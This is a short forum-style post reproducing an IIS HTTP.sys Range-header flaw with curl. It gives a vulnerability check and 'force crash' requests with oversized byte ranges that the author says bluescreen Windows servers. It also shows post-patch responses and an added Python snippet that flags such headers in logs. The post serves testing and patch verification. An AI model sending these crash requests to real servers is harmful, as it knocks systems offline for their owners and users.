I can confirm on Windows 2K8R2 and 2K12, with Kernel Caching enabled (as per default IIS settings) and without any Kernel Caching rules, that I can reproduce the issue using the cURL method.
Steps to reproduce.
Check server is vulnerable
curl -v http://blah.com/ -H "Range: bytes=00-18446744073709551615"
You should see an Error 416.
Force crash
curl -v http://blah.com/images/blah.jpg -H "Range: bytes=100-18446744073709551615"
--and/or--
curl -v http://blah.com/images/blah.jpg -H "Range: bytes=40-18446744073709551615"
Note above: You have to specifically address a file AND use byte range 40 or 100 in my setup to make it bluescreen.
After Patching - Check Vulnerability
curl -v http://blah.com/ -H "Range: bytes=00-18446744073709551615"
Response: Error 400: The request has an invalid header name
After Patching - Force Crash Test
curl -v http://blah.com/images/blah.jpg -H "Range: bytes=100-18446744073709551615"
Response: 206 Partial Content
Hope that helps.
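For the defensive side of the requests above, this added example (not part of the original post) flags logged Range headers whose byte positions are abnormally large, and maps the check request's status to the outcome the post reports. The 2**63 threshold, the function names and the sample records are assumptions made for illustration.

```python
import re

# Assumption: any byte position at or above 2**63 is treated as abnormal;
# the requests in the post use 18446744073709551615 (2**64 - 1).
MAX_SANE_POS = 2**63 - 1
RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def oversized_ranges(header_value):
    """Return the (first, last) pairs in a Range header that exceed MAX_SANE_POS."""
    unit, sep, specs = header_value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return []
    hits = []
    for spec in specs.split(","):
        m = RANGE_SPEC.match(spec)
        if not m:
            continue  # malformed spec: not what this check looks for
        first, last = (int(g) if g else None for g in m.groups())
        if any(p is not None and p > MAX_SANE_POS for p in (first, last)):
            hits.append((first, last))
    return hits


def interpret_check(status):
    """Map the status of the post's check request to the outcome the post reports."""
    outcomes = {416: "unpatched (per the post)", 400: "patched (per the post)"}
    return outcomes.get(status, "inconclusive")


# Constructed sample of logged (client, Range header) pairs, not real traffic.
SAMPLE = [
    ("10.0.0.5", "bytes=0-1023"),
    ("10.0.0.9", "bytes=00-18446744073709551615"),
    ("10.0.0.9", "bytes=100-18446744073709551615"),
    ("10.0.0.7", "bytes=-500"),
    ("10.0.0.8", "bytes=0-99, 200-18446744073709551615"),
]


def flag_requests(records):
    """Return the (client, header) pairs carrying at least one oversized range."""
    return [(c, h) for c, h in records if oversized_ranges(h)]


if __name__ == "__main__":
    for client, header in flag_requests(SAMPLE):
        print(client, header, oversized_ranges(header))
```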